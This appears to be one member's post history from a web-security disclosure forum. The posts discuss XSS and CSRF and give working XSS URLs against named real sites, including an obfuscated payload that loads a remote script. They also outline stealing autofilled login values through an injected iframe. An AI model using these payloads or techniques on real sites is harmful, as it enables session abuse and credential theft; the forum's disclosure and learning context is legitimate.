Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 43
7 years ago
Girzi
Ok, thank you for help ! I'll try to find some informations myself.
Forum: OMG Ponies
7 years ago
Girzi
Yeah I understoof very well don't worry =). Another way to use CSRF is by using flash files... With <img> tag you just can do GET requests nothing more
Forum: CSRF and Session Info
7 years ago
Girzi
You can make POST request with a form that auto-submit or Xmlhttprequest... With <img> tag, you can also use the DOM : var image = new Image(); image.src="http://ha.ckers.org"; Will end with a GET request to ha.kers.org Well nothing new =)
Forum: CSRF and Session Info
7 years ago
Girzi
Ahhhh Ok Thx ! I didn't know this one O_o I think I have to learn some details about encoding it's a very interresting stuff to bypass filters I saw =) Thank you ! Ps : Do you have some interresting links about this stuff xD ?
Forum: XSS Info
7 years ago
Girzi
Thx for the information !
Forum: XSS Info
7 years ago
Girzi
Okey =) I found an XSS on lycos : http://shopping.lycos.fr/query.html?qu=sex&x=19&y=14&tld=com&family=off&inpcatvalue=shopping&cat=%22%3E%3Cscript%20src=%22http://blwood.net/experiences/lycos2.js%22%3E (variable cat , easy one). I included a script on http://blwood.net/experiences/lycos2.js On this page there's a login Form : http://secure.caramail.lycos.fr/s
Forum: XSS Info
7 years ago
Girzi
: / I've did some test but using an <script src="http://url./script.js"></script> for My XSS, I used document.getElementById('iframe_id').document.getElementById('username_field_id').value like you but didn't work. I ask on a Javascript - Devellopers - Board an they told me that I can't because it comes from the security of the navigator : /
Forum: XSS Info
7 years ago
Girzi
Quote Let's say example.com/some/other/file.php was vulnerable to XSS and the login form was on examples.com/login.php. I would inject into /some/other/file.php (the only place I can), then I'd create an iframe to /login.php. Since both files are on the same domain /some/other/file.php has full control over the source code of the iframe and can therefore read the forms. If /login.php simply for
Forum: XSS Info
7 years ago
Girzi
haha Nice list :) i was dead of laugh when I saw hackin9.org on the list !!
Forum: Full Disclosure
7 years ago
Girzi
Yeah this on works : http://www.homme.lycos.fr/hotbabes/categorie/%22%20%20%3Cbody%20onload=alert(%22XSS%22)%3E But I had to use encoded coz he dosen't like my / =) Anyway I found another XSS much better. Thx for help rsnakes :)
Forum: XSS Info
7 years ago
Girzi
Here is it : http://www.homme.lycos.fr/hotbabes/categorie/%22%20%3Cbody%20onload=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,98,108,119,111,111,100,46,110,101,116,47,101,120,112,101,114,105,101,110,99,101,115,47,108,121,99,111,115,46,106,115,62,60,47,115,99,114,105,112,116,62,39,41,59))%3
Forum: XSS Info
7 years ago
Girzi
Hi, Using an reflecting xss, I use it to make somethink like <script src="http://domain.com/myfile.js"></script> bu I had to encode it and use eval + String.fromCharCode. Now myfile.js contain this code : document.write('<iframe src="http://domaine.com/"></iframe>'); In IE it works ! But FF doesn't want it ! Do you know why ? Thanks for help
Forum: XSS Info
7 years ago
Girzi
The project was accepted today by the big boss =) Now I'll have to work on it : )
Forum: XSS Info
7 years ago
Girzi
Hi =) I wanted to know if somebody will go to the Black Hat Europe 2007 in Amsterdam cause I'm from Belgium and it's near so i wanted to go for the first time to a security conference =) Do you have some informations about it ? Do you know other good conferences in Europe ? Thanks for help =) !
Forum: OMG Ponies
7 years ago
Girzi
Thank you I'll have a look at this stuff : )
Forum: XSS Info
7 years ago
Girzi
Yes CRSF are very useful =) But when you found an XSS how do you want to protect about flood / spam. I mean for example in gmail, there is a request to send a mail to s.o but you can't send a request outside because there's a special number - "a token". But with the xss you don't need anymore this token cause you are logged and you use it. So thanks to the xss you can send email, that'
Forum: CSRF and Session Info
7 years ago
Girzi
Buna blad3 ! Romaniiia =) my origins are romanian (parents), I can speak romanian too ;) Anyway it's cool =) Welcome here I'm sur you'll enjoy the board : )
Forum: Intro
7 years ago
Girzi
Wooooowwww =) I want the same in my house :P Okey tomorrow I'll try to male some pictures of my little computer and my little connection of french books :( : /
Forum: OMG Ponies
7 years ago
Girzi
Well for an reflecting XSS most of the time they d'ont answer cause cause you can't do damage immediately on the site. You need to exploit so else. I mean a click or something else... But for Permanent XSS you can do BIIIIG dammage =) Usually they answer. For reflecting xss usally I just d'ont contact them...
Forum: Full Disclosure
7 years ago
Girzi
hahahaha Nice one =) You have to profit of an xss or an csrf if possible to do that, how do you called this technique ? I mean to make somone to believe something. Also how do you do to logg username/password from an htaccess o_O I've never heard of that before. Do you know some informations / papers about these techniques ? Thank you boss : )
Forum: XSS Info
7 years ago
Girzi
No Problem ;-) Well at the moment it's just a project I'm not sure if it's sure , I have to write like a paper for a french magazine about XSS but from the first one to the situation in 2006. I mean I have to follow the history of XSS, devellopment of XSS, their increase in Power through the ages with examples and sour code =). Do you follow me ? (sorry for my bad english :P) When I say a paper
Forum: XSS Info
7 years ago
Girzi
Nice one =) What a bout this one : http://www.homme.lycos.fr/hotbabes/categorie/%22%3E%3Cbody%20onload=alert(%22Blwood%22)%3E Very know in France ;) webmail, search... Let's do a XSS challenge :P ?
Forum: Full Disclosure
7 years ago
Girzi
2 xss on gov.be domain =) Cause I'm from Belgium : P http://directory.gov.be/home/top/category_id/%22%3E%3Cimg%20src=qsd%20onerror=alert(2006)%3E POST /home/search search_string=%22%3E%3Cscript%3Ealert%28%2FBlwood%2F%29%3C%2Fscript%3E&Submit2=Chercher+dans+directory
Forum: Full Disclosure
7 years ago
Girzi
Yeah you're right an .htaccess is a solution. But .htaccess are the solution for every authentification... So I mean it's a perfect solution in a security way but for interactivity it's very annoying... : /
Forum: XSS Info
7 years ago
Girzi
Okey : ) Thx for all these informations, now I'll do some research =) Thx : )
Forum: XSS Info
7 years ago
Girzi
Thank you very much for all these links rsnake and dev80 ! Do you have more informations about the first html injection defacement ? I mean ChatTropolis, because it's a very very interresting anecdote !
Forum: XSS Info
7 years ago
Girzi
http://www.whiteacid.org/misc/string%20to%20code.html Perfect ! :=)
Forum: XSS Info
7 years ago
Girzi
lol : ) We'll w8 for what the boss will say PS : very handy script : http://www.whiteacid.org/misc/code%20to%20string.html It will be even more handy if you inplant the inverse =) Code => String String => Code =)
Forum: XSS Info
7 years ago
Girzi
Well I think the only solution is to sanitize variables properly ... If there're no xss you can't use this flaw. Well I know it's a bad answer but I don't think there's something else to do.
Forum: XSS Info
7 years ago
Girzi
So you wait 2seconds so that Firefox can fill the inputs with the interresting values (setTimeout) and then you get the values with the DOM (document.getElementsByName(String.fromCharCode(108,110))[0].value) => here ln. Now I'm 100 % close =) ?
Forum: XSS Info
Pages: 12Next
Current Page: 1 of 2